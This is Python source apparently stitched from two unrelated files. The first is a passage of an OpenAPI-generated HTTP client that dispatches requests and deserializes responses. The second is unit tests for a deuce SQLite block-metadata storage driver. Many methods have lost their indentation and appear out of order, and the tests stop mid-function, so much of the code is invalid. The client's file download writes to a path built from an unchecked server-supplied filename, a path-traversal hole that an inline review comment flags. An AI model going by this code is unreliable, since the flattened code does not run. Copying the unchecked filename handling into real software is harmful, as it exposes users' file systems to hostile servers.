            url = _host + resource_path
        try:
            # perform request and return response
            response_data = self.request(
                method, url, query_params=query_params, headers=header_params,
                post_params=post_params, body=body,
                _preload_content=_preload_content,
                _request_timeout=_request_timeout)
        except ApiException as e:
            # Normalize the error body to text before re-raising.
            e.body = e.body.decode('utf-8') if six.PY3 else e.body
            raise e
        self.last_response = response_data
        return_data = response_data
        if not _preload_content:
            # Caller asked for the raw response object; skip deserialization.
            return return_data
        response_type = response_types_map.get(response_data.status, None)
        if six.PY3 and response_type not in ["file", "bytes"]:
            match = None
            content_type = response_data.getheader('content-type')
            if content_type is not None:
                match = re.search(r"charset=([a-zA-Z\-\d]+)[\s\;]?", content_type)
            # Decode with the charset from Content-Type, defaulting to UTF-8.
            encoding = match.group(1) if match else "utf-8"
            response_data.data = response_data.data.decode(encoding)
        # deserialize response data
        if response_type:
            return_data = self.deserialize(response_data, response_type)
        else:
            return_data = None
        if _return_http_data_only:
            return (return_data)
        else:
            return (return_data, response_data.status,
                    response_data.getheaders())
def sanitize_for_serialization(self, obj):
"""Builds a JSON POST object.
If obj is None, return None.
If obj is str, int, long, float, bool, return directly.
If obj is datetime.datetime, datetime.date
convert to string in iso8601 format.
If obj is list, sanitize each element in the list.
If obj is dict, return the dict.
If obj is OpenAPI model, return the properties dict.
:param obj: The data to serialize.
:return: The serialized form of data.
"""
if obj is None:
return None
elif isinstance(obj, self.PRIMITIVE_TYPES):
return obj
elif isinstance(obj, list):
return [self.sanitize_for_serialization(sub_obj)
for sub_obj in obj]
elif isinstance(obj, tuple):
return tuple(self.sanitize_for_serialization(sub_obj)
for sub_obj in obj)
elif isinstance(obj, (datetime.datetime, datetime.date)):
return obj.isoformat()
if isinstance(obj, dict):
obj_dict = obj
else:
# Convert model obj to dict except
# attributes `openapi_types`, `attribute_map`
# and attributes which value is not None.
# Convert attribute name to json key in
# model definition for request.
obj_dict = {obj.attribute_map[attr]: getattr(obj, attr)
for attr, _ in six.iteritems(obj.openapi_types)
if getattr(obj, attr) is not None}
return {key: self.sanitize_for_serialization(val)
for key, val in six.iteritems(obj_dict)}
def deserialize(self, response, response_type):
"""Deserializes response into an object.
:param response: RESTResponse object to be deserialized.
:param response_type: class literal for
deserialized object, or string of class name.
:return: deserialized object.
"""
# handle file downloading
# save response body into a tmp file and return the instance
if response_type == "file":
return self.__deserialize_file(response)
# fetch data from response object
try:
data = json.loads(response.data)
except ValueError:
data = response.data
return self.__deserialize(data, response_type)
def __deserialize(self, data, klass):
"""Deserializes dict, list, str into an object.
:param data: dict, list or str.
:param klass: class literal, or string of class name.
:return: object.
"""
if data is None:
return None
if type(klass) == str:
if klass.startswith('list['):
sub_kls = re.match(r'list\[(.*)\]', klass).group(1)
return [self.__deserialize(sub_data, sub_kls)
for sub_data in data]
if klass.startswith('dict('):
sub_kls = re.match(r'dict\(([^,]*), (.*)\)', klass).group(2)
return {k: self.__deserialize(v, sub_kls)
for k, v in six.iteritems(data)}
# convert str to class
if klass in self.NATIVE_TYPES_MAPPING:
klass = self.NATIVE_TYPES_MAPPING[klass]
else:
klass = getattr(mpijob.models, klass)
if klass in self.PRIMITIVE_TYPES:
return self.__deserialize_primitive(data, klass)
elif klass == object:
return self.__deserialize_object(data)
elif klass == datetime.date:
return self.__deserialize_date(data)
elif klass == datetime.datetime:
return self.__deserialize_datetime(data)
else:
return self.__deserialize_model(data, klass)
    def call_api(self, resource_path, method,
                 path_params=None, query_params=None, header_params=None,
                 body=None, post_params=None, files=None,
                 response_types_map=None, auth_settings=None,
                 async_req=None, _return_http_data_only=None,
                 collection_formats=None, _preload_content=True,
                 _request_timeout=None, _host=None, _request_auth=None):
        """Makes the HTTP request (synchronous) and returns deserialized data.

        To make an async_req request, set the async_req parameter.

        :param resource_path: Path to method endpoint.
        :param method: Method to call.
        :param path_params: Path parameters in the url.
        :param query_params: Query parameters in the url.
        :param header_params: Header parameters to be
            placed in the request header.
        :param body: Request body.
        :param post_params dict: Request post form parameters,
            for `application/x-www-form-urlencoded`, `multipart/form-data`.
        :param auth_settings list: Auth Settings names for the request.
        :param response_types_map: map of HTTP status code to response type.
        :param files dict: key -> filename, value -> filepath,
            for `multipart/form-data`.
        :param async_req bool: execute request asynchronously
        :param _return_http_data_only: response data without head status code
                                       and headers
        :param collection_formats: dict of collection formats for path, query,
            header, and post parameters.
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :param _request_auth: set to override the auth_settings for a single
                              request; this effectively ignores the
                              authentication in the spec for a single request.
        :type _request_auth: dict, optional
        :return:
            If async_req parameter is True,
            the request will be called asynchronously.
            The method will return the request thread.
            If parameter async_req is False or missing,
            then the method will return the response directly.
        """
        # Synchronous path: perform the call inline and return the response.
        if not async_req:
            return self.__call_api(resource_path, method,
                                   path_params, query_params, header_params,
                                   body, post_params, files,
                                   response_types_map, auth_settings,
                                   _return_http_data_only, collection_formats,
                                   _preload_content, _request_timeout, _host,
                                   _request_auth)

        # Asynchronous path: hand the call off to the thread pool and return
        # the AsyncResult so the caller can .get() the response later.
        return self.pool.apply_async(self.__call_api, (resource_path,
                                                       method, path_params,
                                                       query_params,
                                                       header_params, body,
                                                       post_params, files,
                                                       response_types_map,
                                                       auth_settings,
                                                       _return_http_data_only,
                                                       collection_formats,
                                                       _preload_content,
                                                       _request_timeout,
                                                       _host, _request_auth))
def request(self, method, url, query_params=None, headers=None,
post_params=None, body=None, _preload_content=True,
_request_timeout=None):
"""Makes the HTTP request using RESTClient."""
if method == "GET":
return self.rest_client.GET(url,
query_params=query_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
headers=headers)
elif method == "HEAD":
return self.rest_client.HEAD(url,
query_params=query_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
headers=headers)
elif method == "OPTIONS":
return self.rest_client.OPTIONS(url,
query_params=query_params,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout)
elif method == "POST":
return self.rest_client.POST(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "PUT":
return self.rest_client.PUT(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "PATCH":
return self.rest_client.PATCH(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "DELETE":
return self.rest_client.DELETE(url,
query_params=query_params,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
else:
raise ApiValueError(
"http method must be `GET`, `HEAD`, `OPTIONS`,"
" `POST`, `PATCH`, `PUT` or `DELETE`."
)
def parameters_to_tuples(self, params, collection_formats):
"""Get parameters as list of tuples, formatting collections.
:param params: Parameters as dict or list of two-tuples
:param dict collection_formats: Parameter collection formats
:return: Parameters as list of tuples, collections formatted
"""
new_params = []
if collection_formats is None:
collection_formats = {}
for k, v in six.iteritems(params) if isinstance(params, dict) else params: # noqa: E501
if k in collection_formats:
collection_format = collection_formats[k]
if collection_format == 'multi':
new_params.extend((k, value) for value in v)
else:
if collection_format == 'ssv':
delimiter = ' '
elif collection_format == 'tsv':
delimiter = '\t'
elif collection_format == 'pipes':
delimiter = '|'
else: # csv is the default
delimiter = ','
new_params.append(
(k, delimiter.join(str(value) for value in v)))
else:
new_params.append((k, v))
return new_params
def files_parameters(self, files=None):
"""Builds form parameters.
:param files: File parameters.
:return: Form parameters with files.
"""
params = []
if files:
for k, v in six.iteritems(files):
if not v:
continue
file_names = v if type(v) is list else [v]
for n in file_names:
with open(n, 'rb') as f:
filename = os.path.basename(f.name)
filedata = f.read()
mimetype = (mimetypes.guess_type(filename)[0] or
'application/octet-stream')
params.append(
tuple([k, tuple([filename, filedata, mimetype])]))
return params
def select_header_accept(self, accepts):
"""Returns `Accept` based on an array of accepts provided.
:param accepts: List of headers.
:return: Accept (e.g. application/json).
"""
if not accepts:
return
accepts = [x.lower() for x in accepts]
if 'application/json' in accepts:
return 'application/json'
else:
return ', '.join(accepts)
def select_header_content_type(self, content_types):
"""Returns `Content-Type` based on an array of content_types provided.
:param content_types: List of content-types.
:return: Content-Type (e.g. application/json).
"""
if not content_types:
return 'application/json'
content_types = [x.lower() for x in content_types]
if 'application/json' in content_types or '*/*' in content_types:
return 'application/json'
else:
return content_types[0]
def update_params_for_auth(self, headers, querys, auth_settings,
request_auth=None):
"""Updates header and query params based on authentication setting.
:param headers: Header parameters dict to be updated.
:param querys: Query parameters tuple list to be updated.
:param auth_settings: Authentication setting identifiers list.
:param request_auth: if set, the provided settings will
override the token in the configuration.
"""
if not auth_settings:
return
if request_auth:
self._apply_auth_params(headers, querys, request_auth)
return
for auth in auth_settings:
auth_setting = self.configuration.auth_settings().get(auth)
if auth_setting:
self._apply_auth_params(headers, querys, auth_setting)
def _apply_auth_params(self, headers, querys, auth_setting):
"""Updates the request parameters based on a single auth_setting
:param headers: Header parameters dict to be updated.
:param querys: Query parameters tuple list to be updated.
:param auth_setting: auth settings for the endpoint
"""
if auth_setting['in'] == 'cookie':
headers['Cookie'] = auth_setting['value']
elif auth_setting['in'] == 'header':
headers[auth_setting['key']] = auth_setting['value']
elif auth_setting['in'] == 'query':
querys.append((auth_setting['key'], auth_setting['value']))
else:
raise ApiValueError(
'Authentication token must be in `query` or `header`'
)
    def __deserialize_file(self, response):
        """Deserializes body to file

        Saves response body into a file in a temporary folder,
        using the filename from the `Content-Disposition` header if provided.

        :param response: RESTResponse.
        :return: file path.
        """
        # Reserve a unique path in the temp folder, then free it again:
        # only the directory/name are reused below.
        fd, path = tempfile.mkstemp(dir=self.configuration.temp_folder_path)
        os.close(fd)
        os.remove(path)

        content_disposition = response.getheader("Content-Disposition")
        if content_disposition:
            # NOTE(review): the filename is taken from the server response
            # unchecked; a hostile value could redirect the write within or
            # outside the temp dir — confirm responses are trusted.
            filename = re.search(r'filename=[\'"]?([^\'"\s]+)[\'"]?',
                                 content_disposition).group(1)
            path = os.path.join(os.path.dirname(path), filename)

        with open(path, "wb") as f:
            f.write(response.data)

        return path
    def __deserialize_primitive(self, data, klass):
        """Deserializes string to primitive type.

        :param data: str.
        :param klass: class literal.
        :return: int, long, float, str, bool.
        """
        try:
            return klass(data)
        except UnicodeEncodeError:
            # Python 2: non-ASCII data cannot round-trip through str();
            # fall back to a unicode string instead.
            return six.text_type(data)
        except TypeError:
            # Data is not coercible to klass; return it untouched.
            return data
    def __deserialize_object(self, value):
        """Return an original value.

        Used for the schema-less ``object`` type, which has nothing to
        deserialize against.

        :return: object.
        """
        return value
    def __deserialize_date(self, string):
        """Deserializes string to date.

        :param string: str.
        :return: date.
        :raises rest.ApiException: when the string is not a parseable date.
        """
        try:
            return parse(string).date()
        except ImportError:
            # Presumably raised when the date parser (dateutil) is not
            # installed; hand back the raw string in that case.
            return string
        except ValueError:
            raise rest.ApiException(
                status=0,
                reason="Failed to parse `{0}` as date object".format(string)
            )
    def __deserialize_datetime(self, string):
        """Deserializes string to datetime.

        The string should be in iso8601 datetime format.

        :param string: str.
        :return: datetime.
        :raises rest.ApiException: when the string is not a parseable
            datetime.
        """
        try:
            return parse(string)
        except ImportError:
            # Presumably raised when the datetime parser (dateutil) is not
            # installed; hand back the raw string in that case.
            return string
        except ValueError:
            raise rest.ApiException(
                status=0,
                reason=(
                    "Failed to parse `{0}` as datetime object"
                    .format(string)
                )
            )
    def __deserialize_model(self, data, klass):
        """Deserializes list or dict to model.

        :param data: dict, list.
        :param klass: class literal.
        :return: model object.
        """
        # Polymorphic models expose get_real_child_model() plus a populated
        # discriminator map used to pick the concrete subclass.
        has_discriminator = False
        if (hasattr(klass, 'get_real_child_model')
                and klass.discriminator_value_class_map):
            has_discriminator = True

        # Schema-less, non-polymorphic models pass the payload through as-is.
        if not klass.openapi_types and has_discriminator is False:
            return data

        kwargs = {}
        if (data is not None and
                klass.openapi_types is not None and
                isinstance(data, (list, dict))):
            # Recursively deserialize every declared attribute found in the
            # payload, translating JSON keys via attribute_map.
            for attr, attr_type in six.iteritems(klass.openapi_types):
                if klass.attribute_map[attr] in data:
                    value = data[klass.attribute_map[attr]]
                    kwargs[attr] = self.__deserialize(value, attr_type)

        instance = klass(**kwargs)

        if has_discriminator:
            # Re-deserialize as the concrete subclass named by the
            # discriminator value, when one is mapped.
            klass_name = instance.get_real_child_model(data)
            if klass_name:
                instance = self.__deserialize(data, klass_name)
        return instance
| |
import ddt
from mock import MagicMock
import random
from deuce.tests import V1Base
from deuce.drivers.metadatadriver import MetadataStorageDriver, GapError,\
OverlapError, ConstraintError
from deuce.drivers.sqlite import SqliteStorageDriver
from deuce.drivers import BlockStorageDriver
import deuce
@ddt.ddt
class SqliteStorageDriverTest(V1Base):
    def _genstorageid(self, blockid):
        # Derive the storage id the driver is expected to use for a
        # metadata block id.
        return BlockStorageDriver.storage_id(blockid)
    def create_driver(self):
        # A fresh driver per test keeps state isolated between test cases.
        return SqliteStorageDriver()
def test_basic_construction(self):
driver = self.create_driver()
def test_geneology(self):
driver = self.create_driver()
assert isinstance(driver, MetadataStorageDriver)
assert isinstance(driver, object)
    def test_vault_statistics(self):
        """Vault statistics must track file/block counts and bad counts."""
        driver = self.create_driver()
        vault_id = self.create_vault_id()
        fileid = self.create_file_id()
        num_blocks = 3

        # empty vault stats
        statistics = driver.get_vault_statistics(vault_id)
        main_keys = ('files', 'blocks')
        for key in main_keys:
            self.assertIn(key, statistics.keys())
            self.assertIn('count', statistics[key].keys())
            self.assertEqual(statistics[key]['count'], 0)

        # Populate: one file plus three registered 1 KiB blocks.
        driver.create_file(vault_id, fileid)
        block_ids = [self.create_block_id() for _ in range(num_blocks)]
        for block_id in block_ids:
            storage_id = self.create_storage_block_id()
            blocksize = 1024
            driver.register_block(vault_id, block_id, storage_id, blocksize)

        stats = driver.get_vault_statistics(vault_id)
        self.assertEqual(stats['blocks']['count'], 3)
        self.assertEqual(stats['files']['count'], 1)
        self.assertEqual(stats['blocks']['bad'], 0)
        self.assertEqual(stats['files']['bad'], 0)

        # Assign the blocks contiguously and finalize the file so that
        # marking every block bad also marks the file bad.
        offsets = []
        for i in range(num_blocks):
            offsets.append(i * 1024)
        driver.assign_blocks(vault_id, fileid, block_ids, offsets)
        driver.finalize_file(vault_id, fileid, file_size=num_blocks * 1024)

        for block_id in block_ids:
            driver.mark_block_as_bad(vault_id, block_id)

        new_stats = driver.get_vault_statistics(vault_id)
        self.assertEqual(new_stats['blocks']['count'], 3)
        self.assertEqual(new_stats['files']['count'], 1)
        self.assertEqual(new_stats['blocks']['bad'], 3)
        self.assertEqual(new_stats['files']['bad'], 1)
def test_db_health(self):
driver = self.create_driver()
retval = driver.get_health()
driver.get_health = MagicMock(return_value=str('is not active.'))
retval = driver.get_health()
self.assertEqual(retval, str('is not active.'))
    def test_file_crud(self):
        """Create/query/delete lifecycle of a single file."""
        driver = self.create_driver()
        vault_id = self.create_vault_id()
        file_id = self.create_file_id()

        self.assertFalse(driver.has_file(vault_id, file_id))

        # Length of Non-existent file is 0
        file_length = driver.file_length(vault_id, file_id)
        self.assertEqual(file_length, 0)

        driver.create_file(vault_id, file_id)
        self.assertTrue(driver.has_file(vault_id, file_id))

        # A freshly created (empty) file also reports length 0.
        file_length = driver.file_length(vault_id, file_id)
        self.assertEqual(file_length, 0)

        # Smoke call only; the returned data is deliberately unchecked here.
        data = driver.get_file_data(vault_id, file_id)

        driver.delete_file(vault_id, file_id)
        self.assertFalse(driver.has_file(vault_id, file_id))
    def test_finalize_files(self):
        """Register/assign/finalize a one-block file in two separate vaults."""
        driver = self.create_driver()
        # Map of vault_id -> file_id for two independent vaults.
        vaults = {
            self.create_vault_id(): self.create_file_id()
            for _ in range(2)
        }

        block_data = 'a'
        block_length = len(block_data)
        block_id = 's'
        block_offset = 0

        for vault_id, file_id in vaults.items():
            driver.register_block(vault_id,
                                  block_id,
                                  self._genstorageid(block_id),
                                  block_length)

            # has_blocks returns the ids that are missing; none should be.
            results = driver.has_blocks(vault_id, block_id)
            self.assertEqual(results, [])

            driver.assign_blocks(vault_id,
                                 file_id,
                                 [block_id],
                                 [block_offset])
            # The single block spans the whole file, so its length is the
            # final file size.
            driver.finalize_file(vault_id,
                                 file_id,
                                 block_length)
def test_finalize_empty_file(self):
driver = self.create_driver()
vault_id = self.create_vault_id()
file_id = self.create_file_id()
driver.create_file(vault_id, file_id)
self.assertFalse(driver.is_finalized(vault_id, file_id))
driver.finalize_file(vault_id, file_id)
self.assertTrue(driver.is_finalized(vault_id, file_id))
file_length = driver.file_length(vault_id, file_id)
self.assertEqual(file_length, 0)
def test_finalize_nonexistent_file(self):
driver = self.create_driver()
vault_id = self.create_vault_id()
file_id = self.create_file_id()
self.assertFalse(driver.has_file(vault_id, file_id))
retval = driver.finalize_file(vault_id, file_id)
file_length = driver.file_length(vault_id, file_id)
self.assertEqual(file_length, 0)
try:
data = driver.get_file_data(vault_id, file_id)
except:
self.assertTrue(True)
self.assertFalse(driver.has_file(vault_id, file_id))
self.assertFalse(driver.is_finalized(vault_id, file_id))
def test_vault_health_bad_blocks(self):
driver = self.create_driver()
vault_id = self.create_vault_id()
num_blocks = 10
block_ids = [self.create_block_id() for _ in range(num_blocks)]
size = 1024
for block_id in block_ids:
gen_storage_id = self._genstorageid(block_id)
driver.register_block(vault_id, block_id, gen_storage_id, size)
bad_blocks, bad_files = driver.vault_health(vault_id)
self.assertEqual(bad_blocks, 0)
self.assertEqual(bad_files, 0)
for block_id in block_ids:
driver.mark_block_as_bad(vault_id, block_id)
bad_blocks, bad_files = driver.vault_health(vault_id)
self.assertEqual(bad_blocks, num_blocks)
self.assertEqual(bad_files, 0)
    def test_vault_health_bad_files(self):
        """A finalized file becomes bad once its blocks are marked bad."""
        driver = self.create_driver()
        vault_id = self.create_vault_id()
        file_id = self.create_file_id()
        num_blocks = 10
        new_block_ids = [self.create_block_id() for _ in range(num_blocks)]
        size = 1024

        for block_id in new_block_ids:
            gen_storage_id = self._genstorageid(block_id)
            driver.register_block(vault_id, block_id, gen_storage_id, size)

        # Build a finalized file from all the blocks, laid out contiguously.
        driver.create_file(vault_id, file_id)
        offsets = []
        for i in range(num_blocks):
            offsets.append(i * 1024)
        driver.assign_blocks(vault_id, file_id, new_block_ids, offsets)
        driver.finalize_file(vault_id, file_id, 1024 * num_blocks)

        for block_id in new_block_ids:
            driver.mark_block_as_bad(vault_id, block_id)

        # All blocks are bad -> the single file referencing them is bad too.
        bad_blocks, bad_files = driver.vault_health(vault_id)
        self.assertEqual(bad_files, 1)
        self.assertEqual(bad_blocks, num_blocks)
    def test_blockid_to_storageid(self):
        """Block id <-> storage id mapping exists only while registered."""
        driver = self.create_driver()
        vault_id = self.create_vault_id()
        block_id = self.create_block_id()
        size = 1024
        gen_storage_id = self._genstorageid(block_id)

        driver.register_block(vault_id, block_id, gen_storage_id, size)
        # The mapping must round-trip in both directions.
        meta_storage_id = driver.get_block_storage_id(vault_id, block_id)
        meta_block_id = driver.get_block_metadata_id(vault_id, gen_storage_id)
        self.assertEqual(gen_storage_id, meta_storage_id)
        self.assertEqual(meta_block_id, block_id)

        self.assertTrue(driver.has_block(vault_id, block_id))
        driver.unregister_block(vault_id, block_id)
        self.assertFalse(driver.has_block(vault_id, block_id))

        # Lookups for ids that were never registered return None.
        bogus_storage_id = driver.get_block_storage_id(
            vault_id,
            self.create_block_id(b'bogus'))
        self.assertIsNone(bogus_storage_id)
        bogus_block_id = driver.get_block_metadata_id(
            vault_id,
            self._genstorageid(self.create_block_id(b'bogus')))
        self.assertIsNone(bogus_block_id)
def test_block_crud(self):
driver = self.create_driver()
vault_id = self.create_vault_id()
block_id = self.create_block_id()
size = 4096
reftime = 0
self.assertFalse(driver.has_block(vault_id, block_id))
try:
reftime = driver.get_block_ref_modified(vault_id, block_id)
except:
self.assertTrue(True)
self.assertEqual(reftime, 0)
try:
block_data = driver.get_block_data(vault_id, block_id)
size = block_data['blocksize']
reftime = block_data['reftime']
except:
self.assertTrue(True)
driver.register_block(vault_id, block_id, self._genstorageid(block_id),
size)
try:
new_reftime = driver.get_block_ref_modified(vault_id, block_id)
except:
self.assertTrue(True)
self.assertNotEqual(reftime, new_reftime)
self.assertTrue(driver.has_block(vault_id, block_id))
self.assertEqual(driver.get_block_data(vault_id,
block_id)['blocksize'], size)
# Call again, shouldn't throw
driver.register_block(vault_id, block_id, self._genstorageid(block_id),
size)
driver.unregister_block(vault_id, block_id)
self.assertFalse(driver.has_block(vault_id, block_id))
self.assertFalse(driver.has_block(vault_id, 'invalidid'))
    def test_file_assignment_no_block(self):
        """Finalizing with only unregistered blocks raises GapError."""
        driver = self.create_driver()
        vault_id = self.create_vault_id()
        file_id = self.create_file_id()

        self.assertEqual(driver.has_file(vault_id,
                                         file_id), False)
        driver.create_file(vault_id, file_id)
        self.assertEqual(driver.has_file(vault_id, file_id), True)

        # Assign blocks that were never registered; with no sizes on record
        # the whole file range reads as a gap.
        driver.assign_block(vault_id, file_id, 'block_a', 0)
        driver.assign_block(vault_id, file_id, 'block_b', 1024)

        with self.assertRaises(GapError) as ctx:
            driver.finalize_file(vault_id, file_id, 2048)

        # The reported gap covers the entire declared file size.
        self.assertEqual(ctx.exception.vault_id, vault_id)
        self.assertEqual(ctx.exception.file_id, file_id)
        self.assertEqual(ctx.exception.startpos, 0)
        self.assertEqual(ctx.exception.endpos, 2048)

        self.assertEqual(driver.is_finalized(vault_id, file_id),
                         False)
def test_delete_block_no_refs(self):
driver = self.create_driver()
vault_id = self.create_vault_id()
block_id = 'block_0'
block_size = 1024
self.assertEqual(driver.get_block_ref_count(vault_id, block_id), 0)
driver.register_block(vault_id, block_id,
self._genstorageid(block_id),
block_size)
self.assertEqual(driver.get_block_ref_count(vault_id, block_id), 0)
driver.unregister_block(vault_id, block_id)
self.assertEqual(driver.get_block_ref_count(vault_id, block_id), 0)
    def test_delete_block_with_refs(self):
        """A block still referenced by a file cannot be unregistered."""
        driver = self.create_driver()
        vault_id = self.create_vault_id()
        file_id = self.create_file_id()
        block_id = 'block_0'
        block_size = 1024

        driver.create_file(vault_id, file_id)
        driver.register_block(vault_id, block_id,
                              self._genstorageid(block_id),
                              block_size)
        self.assertTrue(driver.has_block(vault_id, block_id))

        # Should have no refs until assigned; after the two assignments
        # below the count should be two.
        self.assertEqual(driver.get_block_ref_count(vault_id, block_id), 0)
        driver.assign_block(vault_id, file_id, block_id, 0)
        driver.assign_block(vault_id, file_id, block_id, 1024)
        self.assertEqual(driver.get_block_ref_count(vault_id, block_id), 2)

        # Now test unregistering the block. This should fail because live
        # references still exist.
        with self.assertRaises(ConstraintError) as ctx:
            driver.unregister_block(vault_id, block_id)
        self.assertEqual(ctx.exception.project_id, deuce.context.project_id)
        self.assertEqual(ctx.exception.vault_id, vault_id)
def test_delete_file_check_refs(self):
driver = self.create_driver()
vault_id = self.create_vault_id()
file_id = self.create_file_id()
block_id = 'block_0'
block_size = 1024
driver.create_file(vault_id, file_id)
driver.register_block(vault_id, block_id,
self._genstorageid(block_id),
block_size)
driver.assign_block(vault_id, file_id, block_id, 0)
self.assertEqual(driver.get_block_ref_count(vault_id, block_id), 1)
driver.delete_file(vault_id, file_id)
self.assertEqual(driver.get_block_ref_count(vault_id, block_id), 0)
def test_assign_multiple_blocks_before_adding_blocks(self):
driver = self.create_driver()
vault_id = self.create_vault_id()
file_id = self.create_file_id()
block_ids = ['block_'.join(str(i)) for i in range(10)]
block_sizes = [random.randrange(10, 100) for _ in range(10)]
offsets = [0]
offset = 0
for block_size in block_sizes:
offset += block_size
offsets.append(offset)
driver.create_file(vault_id, file_id)
results = driver.has_blocks(vault_id, block_ids)
self.assertEqual(results, block_ids)
driver.assign_blocks(vault_id, file_id, block_ids, offsets[:-1])
for block_id, block_size in zip(block_ids, block_sizes):
driver.register_block(vault_id, block_id,
self._genstorageid(block_id),
block_size)
results = driver.has_blocks(vault_id, block_ids)
self.assertEqual(results, [])
for block_id in block_ids:
self.assertEqual(driver.get_block_ref_count(vault_id, block_id), 1)
driver.delete_file(vault_id, file_id)
for block_id in block_ids:
self.assertEqual(driver.get_block_ref_count(vault_id, block_id), 0)
def test_assign_multiple_blocks_after_adding_blocks(self):
driver = self.create_driver()
vault_id = self.create_vault_id()
file_id = self.create_file_id()
block_ids = ['block_'.join(str(i)) for i in range(10)]
block_sizes = [random.randrange(10, 100) for _ in range(10)]
offsets = [0]
offset = 0
for block_size in block_sizes:
offset += block_size
offsets.append(offset)
driver.create_file(vault_id, file_id)
results = driver.has_blocks(vault_id, block_ids)
self.assertEqual(results, block_ids)
for block_id, block_size in zip(block_ids, block_sizes):
driver.register_block(vault_id, block_id,
self._genstorageid(block_id),
block_size)
results = driver.has_blocks(vault_id, block_ids)
self.assertEqual(results, [])
driver.assign_blocks(vault_id, file_id, block_ids, offsets[:-1])
for block_id in block_ids:
self.assertEqual(driver.get_block_ref_count(vault_id, block_id), 1)
driver.delete_file(vault_id, file_id)
for block_id in block_ids:
self.assertEqual(driver.get_block_ref_count(vault_id, block_id), 0)
    def test_block_references(self):
        """Assigning a block to a file bumps its ref count from 0 to 1."""
        driver = self.create_driver()
        vault_id = self.create_vault_id()
        num_elements = 1

        # Create a bunch of file IDs
        file_ids = [self.create_file_id() for _ in range(0, num_elements)]

        # Now create some block IDs
        block_ids = ['block_{0}'.format(x) for x in range(0, num_elements)]
        block_size = 1024

        # Create each of those files
        for file_id in file_ids:
            driver.create_file(vault_id, file_id)

        for block_id in block_ids:
            self.assertEqual(driver.has_block(vault_id, block_id), False)
            # Check the block references on a non-existent block. Should be 0
            self.assertEqual(driver.get_block_ref_count(vault_id, block_id), 0)
            driver.register_block(vault_id, block_id,
                                  self._genstorageid(block_id),
                                  block_size)
            self.assertEqual(driver.has_block(vault_id, block_id), True)
            # Check the block references for these blocks. They should all be 0
            # because registration alone creates no file references.
            self.assertEqual(driver.get_block_ref_count(vault_id, block_id), 0)

        # Now assign each block to a single file. The reference count for each
        # block should be incremented to 1
        for i in range(0, num_elements):
            file_id = file_ids[i]
            block_id = block_ids[i]
            self.assertEqual(driver.get_block_ref_count(vault_id, block_id), 0)
            driver.assign_block(vault_id, file_id, block_id, 0)
            self.assertEqual(driver.get_block_ref_count(vault_id, block_id), 1)

            # Each 'file' is one block in length
            driver.finalize_file(vault_id, file_id, file_size=block_size)
            self.assertEqual(driver.is_finalized(vault_id, file_id), True)

            # Finalizing the file should not change the block
            # reference count
            self.assertEqual(driver.get_block_ref_count(vault_id, block_id), 1)
    def test_file_assignment_registration(self):
        """Finalize succeeds whether blocks register before or after assign."""
        driver = self.create_driver()
        vault_id = self.create_vault_id()
        file_id = self.create_file_id()

        self.assertEqual(driver.has_file(vault_id, file_id), False)
        driver.create_file(vault_id, file_id)
        self.assertEqual(driver.has_file(vault_id, file_id), True)

        # Create one block before assigning and one block after
        driver.register_block(vault_id, 'block_a',
                              self._genstorageid('block_a'),
                              1024)
        driver.assign_block(vault_id, file_id, 'block_a', 0)
        driver.assign_block(vault_id, file_id, 'block_b', 1024)
        driver.register_block(vault_id, 'block_b',
                              self._genstorageid('block_b'),
                              1024)

        self.assertEqual(driver.is_finalized(vault_id, file_id), False)
        # Two contiguous 1024-byte blocks -> a 2048-byte file with no gaps.
        driver.finalize_file(vault_id, file_id, 2048)
        self.assertEqual(driver.is_finalized(vault_id, file_id),
                         True)
    def test_file_assignment_gap_at_front(self):
        """Omitting the first block yields a GapError starting at offset 0."""
        driver = self.create_driver()
        vault_id = self.create_vault_id()
        file_id = self.create_file_id()

        min_block_size = 101
        max_block_size = 10000
        num_blocks = 10

        driver.create_file(vault_id, file_id)

        block_ids = ['block_{0}'.format(id) for id in range(0, num_blocks)]
        block_sizes = [random.randrange(min_block_size, max_block_size)
                       for _ in range(0, num_blocks)]
        # Contiguous layout: each offset is the cumulative preceding size.
        offsets = [sum(block_sizes[:x]) for x in range(0, num_blocks)]

        blocklist = list(zip(block_ids, block_sizes, offsets))
        file_size = sum(block_sizes)

        # register all of the blocks
        for block_id, block_size, offset in blocklist:
            driver.register_block(vault_id, block_id,
                                  self._genstorageid(block_id),
                                  block_size)

        # Remove the first set of blocks, creating a gap at the beginning of
        # the file.  Note: the middle tuple element is the first block's
        # SIZE, which equals the offset where the next block starts — i.e.
        # where the gap ends.
        _, required_offset, _ = blocklist[0]
        del blocklist[0]

        # now for fun randomize the order that we
        # will assign the blocks in
        # random.shuffle(blocklist)

        for block_id, block_size, offset in blocklist:
            driver.assign_block(vault_id, file_id, block_id, offset)

        with self.assertRaises(GapError) as ctx:
            driver.finalize_file(vault_id, file_id, file_size)

        # The gap spans from the start of the file to the missing block's
        # end position.
        self.assertEqual(ctx.exception.vault_id, vault_id)
        self.assertEqual(ctx.exception.startpos, 0)
        self.assertEqual(ctx.exception.endpos, required_offset)
    def test_file_assignment_overlap_error_in_middle(self):
        """Shifting one block backwards raises OverlapError on finalize."""
        driver = self.create_driver()
        vault_id = self.create_vault_id()
        file_id = self.create_file_id()

        min_block_size = 101
        max_block_size = 10000
        num_blocks = 10

        driver.create_file(vault_id, file_id)

        block_ids = ['block_{0}'.format(id) for id in range(0, num_blocks)]
        block_sizes = [random.randrange(min_block_size, max_block_size)
                       for _ in range(0, num_blocks)]
        # Contiguous layout: each offset is the cumulative preceding size.
        offsets = [sum(block_sizes[:x]) for x in range(0, num_blocks)]

        # Now take the second block's offset and subtract 10 from its
        # offset. This should create an overlap between the second
        # and first block.
        expected_startpos = offsets[1] - 10
        expected_endpos = offsets[1]
